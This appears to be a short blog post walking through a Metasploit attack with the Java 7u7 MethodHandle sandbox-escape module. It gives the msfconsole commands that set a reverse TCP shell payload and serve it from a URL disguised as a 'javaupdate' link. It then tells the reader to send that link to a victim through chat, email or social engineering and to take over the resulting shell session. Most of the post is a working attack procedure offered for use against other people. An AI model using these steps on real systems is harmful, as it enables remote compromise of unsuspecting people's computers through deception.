This module abuses the Method
Handle class from a Java Applet to run arbitrary Java code outside of the
sandbox. The vulnerability affects Java version 7u7 and earlier.
Exploit
Targets
Java
7 Update 7
Windows
PC
Linux
PC
MAC
OS X PC
Requirement
Attacker: Backtrack 5
Victim PC: Windows 7
Open
backtrack terminal type msfconsole
Now type use
exploit/windows/browser/java_jre17_method_handle
msf exploit (java_jre17_method_handle)>set payload java/shell_reverse_tcp
msf exploit (java_jre17_method_handle)>set lhost 192.168.1.3 (IP of Local
Host)
msf exploit (java_jre17_method_handle)>set srvhost 192.168.1.3 (This must be
an address on the local machine)
msf exploit (java_jre17_method_handle)>set uripath javaupdate (The Url to use
for this exploit)
msf exploit (java_jre17_method_handle)>exploit
Now an URL you
should give to your victim http://192.168.1.3:8080/javaupdate
Send
the link of the server to the victim via chat or email or any social
engineering technique.
Now
you have access to the victims PC. Use “sessions -l” and the Session
number to connect to the session. And Now Type “sessions -i ID“
No comments:
Post a Comment